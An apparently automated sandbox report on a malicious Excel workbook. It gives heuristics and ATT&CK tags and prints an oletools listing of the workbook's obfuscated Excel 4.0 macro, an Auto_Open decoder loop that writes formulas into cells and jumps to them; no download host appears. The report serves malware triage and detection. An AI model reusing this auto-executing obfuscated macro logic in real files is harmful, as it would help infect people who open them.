MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, a known method for executing malicious code as soon as the workbook is opened. The macro sheet contains a dangerous formula API call (RUN=0), suggesting it is designed to execute a payload. While no specific URLs or hashes were extracted, the presence of Auto_Open strongly implies downloader or dropper functionality.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6709 bytes |

SHA-256: d17ec1a8dafe3e7a8beb2daf4ef845bad9956bd00a8a57c04548526a9d885b76
Preview script: first 1,000 lines of the extracted script
```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AXIhtoKvTgq
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C188
' 0018 27 LABEL : Cell Value, String Constant - FbTQxHHQykdl len=0
' 0018 22 LABEL : Cell Value, String Constant - fGDOYTo len=0
' 0018 26 LABEL : Cell Value, String Constant - fpzGzdldDAY len=0
' 0018 24 LABEL : Cell Value, String Constant - jhVpDdVzB len=0
' 0018 27 LABEL : Cell Value, String Constant - jLTygsDeNDrJ len=0
' 0018 24 LABEL : Cell Value, String Constant - KfpxRAXTE len=0
' 0018 22 LABEL : Cell Value, String Constant - lAEAAlA len=0
' 0018 24 LABEL : Cell Value, String Constant - lkdIwqHUH len=0
' 0018 23 LABEL : Cell Value, String Constant - MJAOEzpM len=0
' 0018 27 LABEL : Cell Value, String Constant - NntQmIcwQmxo len=0
' 0018 25 LABEL : Cell Value, String Constant - nPQdsUjNNs len=0
' 0018 25 LABEL : Cell Value, String Constant - nUlsfnhVaD len=0
' 0018 21 LABEL : Cell Value, String Constant - pPpklw len=0
' 0018 20 LABEL : Cell Value, String Constant - QAOVD len=0
' 0018 27 LABEL : Cell Value, String Constant - snLfpdblixPy len=0
' 0018 27 LABEL : Cell Value, String Constant - VgqToRBqHnwN len=0
' 0018 27 LABEL : Cell Value, String Constant - XmbZXnMrOFtm len=0
' 0018 21 LABEL : Cell Value, String Constant - YTCmUQ len=0
' 0018 22 LABEL : Cell Value, String Constant - ZAiQzjB len=0
' 0018 22 LABEL : Cell Value, String Constant - zgpYjqh len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' AXIhtoKvTgq,C96,"SET.NAME("FbTQxHHQykdl",VALUE("0"))",""
' AXIhtoKvTgq,C101,"SET.NAME("XmbZXnMrOFtm",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C104,"SET.NAME("NntQmIcwQmxo",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C106,"SET.NAME("YTCmUQ",COUNTA(jLTygsDeNDrJ))",""
' AXIhtoKvTgq,C110,"SET.NAME("nUlsfnhVaD",COUNTA(MJAOEzpM))",""
' AXIhtoKvTgq,C114,[],""
' AXIhtoKvTgq,C117,"SET.NAME("snLfpdblixPy","")",""
' AXIhtoKvTgq,C120,"XmbZXnMrOFtm",""
' AXIhtoKvTgq,C123,"SET.NAME("ZAiQzjB",HLOOKUP("*",jLTygsDeNDrJ,XmbZXnMrOFtm,FALSE))",""
' AXIhtoKvTgq,C126,"fpzGzdldDAY",""
' AXIhtoKvTgq,C128,"SET.NAME("pPpklw",FbTQxHHQykdl)",""
' AXIhtoKvTgq,C130,[],""
' AXIhtoKvTgq,C132,"pPpklw",""
' AXIhtoKvTgq,C136,"VgqToRBqHnwN",""
' AXIhtoKvTgq,C141,"lAEAAlA",""
' AXIhtoKvTgq,C145,"zgpYjqh",""
' AXIhtoKvTgq,C147,"SET.NAME("KfpxRAXTE",VALUE(HLOOKUP("*",MJAOEzpM,zgpYjqh,FALSE)))",""
' AXIhtoKvTgq,C152,"lkdIwqHUH",""
' AXIhtoKvTgq,C156,"snLfpdblixPy",""
' AXIhtoKvTgq,C159,"NntQmIcwQmxo",""
' AXIhtoKvTgq,C163,NEXT(),""
' AXIhtoKvTgq,C166,"jhVpDdVzB",""
' AXIhtoKvTgq,C169,"SET.NAME("f",INT(T(FORMULA(T(snLfpdblixPy)&"",""&T(jhVpDdVzB)))))",""
' AXIhtoKvTgq,C174,"nPQdsUjNNs",""
' AXIhtoKvTgq,C179,NEXT(),""
' AXIhtoKvTgq,C184,RETURN(),""
' AXIhtoKvTgq,C209,"SET.NAME("fGDOYTo",C96)",""
' AXIhtoKvTgq,C214,"jLTygsDeNDrJ",""
' AXIhtoKvTgq,C216,"SET.NAME("MJAOEzpM",R93C12)",""
' AXIhtoKvTgq,C219,"SET.NAME("nPQdsUjNNs",226)",""
' AXIhtoKvTgq,C223,"SET.NAME("QAOVD",3)",""
' AXIhtoKvTgq,C225,fGDOYTo(),""
' AXIhtoKvTgq,C226,HALT(),""
```